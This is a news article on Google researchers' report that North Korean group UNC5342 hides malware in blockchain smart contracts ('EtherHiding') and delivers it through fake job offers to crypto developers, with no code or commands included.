North Korean threat actor UNC5342 is using a new technique to spread malware via public blockchains: EtherHiding. Researchers at Google Threat Intelligence discovered that the group has been using this method since early 2025 in a social engineering campaign targeting developers in the crypto and technology sector.

EtherHiding uses smart contracts on blockchains such as Ethereum and BNB Smart Chain to hide and spread malicious code. This approach provides attackers with a virtually indestructible infrastructure, as the data on the blockchain is decentralized, transparent, and immutable. In the context of cybercrime, EtherHiding is considered a form of bulletproof hosting. This is infrastructure that is immune to legal or technical removal.

In the campaign, UNC5342 approaches victims via fake job advertisements. The attackers pose as recruiters from well-known technology companies and convince targets to perform test assignments or download files. These files contain the JADESNOW malware, a JavaScript loader.

This connects to a smart contract on the blockchain. It contains an encrypted payload that, once decrypted, initiates the second phase of infection. Ultimately, the INVISIBLEFERRET backdoor is executed, giving the attackers long-term access to the system and enabling them to steal data or cryptocurrency.

Blockchain offers protection to actors

According to Google researchers, in addition to UNC5342, financially motivated actors such as UNC5142 also use EtherHiding to spread malware. The advantages of this technique are considerable: the decentralized nature of blockchains prevents smart contracts from being deleted, immutability protects against modification, transactions remain pseudonymous, and retrieving the malware leaves no traces in log files.

Furthermore, attackers can update their malicious code at any time. Creating or modifying a smart contract typically costs less than two dollars, making EtherHiding a cheap and efficient method.

The application of EtherHiding illustrates how blockchain technology, originally intended for transparency and decentralization, is being misused as a permanent command-and-control mechanism. North Korea’s growing cyber capabilities support this shift. According to blockchain analysis company Elliptic, the country will have looted more than $2 billion in cryptocurrency by 2025. EtherHiding thus marks a new chapter in the convergence of state cyber operations, financial motives, and Web3 infrastructures.